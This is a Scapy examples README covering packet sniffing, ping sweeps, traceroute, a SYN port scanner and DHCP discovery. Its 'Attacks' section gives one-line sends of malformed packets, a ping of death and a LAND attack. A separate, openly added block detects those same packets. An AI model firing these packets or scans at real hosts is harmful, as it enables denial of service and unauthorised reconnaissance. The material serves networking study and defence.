Uberscapy
Scapy docs, examples, scripts and other stuff
WARNING: NOT ALL SCRIPTS ARE TESTED! CHECK BEFORE RUNNING!
Contents
docs - different Scapy docs
examples - examples for official Scapy usage and more
Tutorial
Official Scapy usage tutorial is located here
Simple examples
Sniff
Sniffing on eth0:
sniff(iface="eth0", prn=lambda x: x.summary())
sniff(iface="eth0", prn=lambda x: x.show())
Formatted sniff output
pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))
Identify ports
a=sniff(filter="tcp and ( port 25 or port 110 )", \
prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport% %2s,TCP.flags% : %TCP.payload%"))
Ping
TCP ping:
srloop(IP(dst="www.google.com/30")/TCP())
TCP ping:
ans,unans = sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )
ans.summary( lambda s, r: r.sprintf("%IP.src% conteasta") )
UDP ping
ans,unans = sr( IP(dst="192.168.1.1-10")/UDP(dport=0) )
ans.summary( lambda s, r: r.sprintf("%IP.src% contesta en udp") )
ARP ping manual:
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)
ans.summary( lambda s, r: r.sprintf("%Ether.src% %ARP.psrc%") )
ARP ping built in:
arping("192.168.1.1")
Traceroute:
traceroute(["www.google.com","www.ust.cl","www.terra.cl","www.microsoft.com"],maxttl=20)
result, unans=_
result.show()
# save output
result.graph(type="ps", target="|lp")
result.graph(target="> grafico.svg")
Advanced traceroute + DNS
ans,unans = sr(IP(dst="terra.cl",ttl=(1,10))/TCP(dport=53,flags="S"))
ans.summary( lambda s, r: r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}") )
Dump traceroute output:
res,unans = traceroute(["www.ust.cl","www.santotomas.cl"],dport=[80,443],maxttl=20,retry=-2)
res.graph(type="ps", target="|lp")
res.graph(target="> grafico.svg")
Port scanner:
res,unans = sr( IP(dst="target")/TCP(flags="S", dport=(1,1024)) )
res.nsummary( lfilter=lambda s, r: (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )
OS fingerprint:
ans,unans = srloop(IP(dst="192.168.1.1")/TCP(dport=80,flags="S"))
Attacks
Malformed packets:
send(IP(dst="192.168.1.1", ihl=2, version=3)/ICMP())
Ping of death:
send( fragment(IP(dst="192.168.1.1")/ICMP()/("X"*60000)) )
Land attack (windows):
send(IP(src=target,dst=target)/TCP(sport=135,dport=135))
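Detection side of the three packet types named above, as an added example that is not part of this repository: it parses raw IPv4 bytes with the standard library (not Scapy, so it runs without it) and labels an invalid version/IHL, a reassembled length beyond the 65535-byte IPv4 maximum, and a TCP packet whose source and destination address and port are identical. The function names (`build_ipv4`, `inspect`, `scan`) and the sample packets on 192.0.2.0/24 are constructed for illustration.

```python
import socket
import struct

IP_FMT = "!BBHHHBBH4s4s"  # fixed 20-byte IPv4 header

def build_ipv4(src, dst, proto, payload=b"", version=4, ihl=5, frag_units=0):
    """Constructed test input: IPv4 header (checksum left 0) plus payload."""
    total_len = 20 + len(payload)
    return struct.pack(IP_FMT, (version << 4) | ihl, 0, total_len, 0,
                       frag_units & 0x1FFF, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst)) + payload

def inspect(raw):
    """Return anomaly labels for one raw IPv4 packet (empty list = none)."""
    if len(raw) < 20:
        return ["truncated"]
    vihl, _, total_len, _, frag, _, proto, _, src, dst = struct.unpack(IP_FMT, raw[:20])
    version, ihl = vihl >> 4, vihl & 0x0F
    if version != 4 or ihl < 5:
        return ["malformed-header"]   # later offsets cannot be trusted
    findings = []
    frag_off = (frag & 0x1FFF) * 8    # fragment offset is in 8-byte units
    if frag_off + total_len > 65535:  # would reassemble past the IPv4 maximum
        findings.append("oversized-reassembly")
    l4 = raw[ihl * 4: ihl * 4 + 4]
    if src == dst and proto == 6 and frag_off == 0 and len(l4) == 4:
        sport, dport = struct.unpack("!HH", l4)
        if sport == dport:            # LAND: same address and same port
            findings.append("land")
    return findings

# Constructed samples using documentation addresses (192.0.2.0/24).
tcp_135 = struct.pack("!HH", 135, 135) + b"\x00" * 16
tcp_web = struct.pack("!HH", 40000, 80) + b"\x00" * 16
SAMPLES = {
    "bad_header": build_ipv4("192.0.2.1", "192.0.2.10", 1, version=3, ihl=2),
    "land": build_ipv4("192.0.2.10", "192.0.2.10", 6, tcp_135),
    "late_fragment": build_ipv4("192.0.2.1", "192.0.2.10", 1, b"X" * 100, frag_units=8191),
    "normal": build_ipv4("192.0.2.1", "192.0.2.10", 6, tcp_web),
}

def scan(samples=SAMPLES):
    """Map each sample name to the anomaly labels found in it."""
    return {name: inspect(pkt) for name, pkt in samples.items()}

if __name__ == "__main__":
    for name, found in scan().items():
        print(name, found or "ok")
```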
DHCP discovery:
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
ans, unans = srp(dhcp_discover, multi=True)
ans.display()
Links
http://stackoverflow.com/questions/10818661/scapy-retrieving-rssi-from-wifi-packets
http://hackoftheday.securitytube.net/2013/04/wi-fi-ssid-sniffer-in-12-lines-of.html
http://hackoftheday.securitytube.net/2013/03/wi-fi-sniffer-in-10-lines-of-python.html
http://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1191&context=etd_projects
http://pen-testing.sans.org/blog/2011/10/13/special-request-wireless-client-sniffing-with-scapy
http://raidersec.blogspot.com/2013/01/wireless-deauth-attack-using-aireplay.html
http://www.secdev.org/projects/scapy/portability.html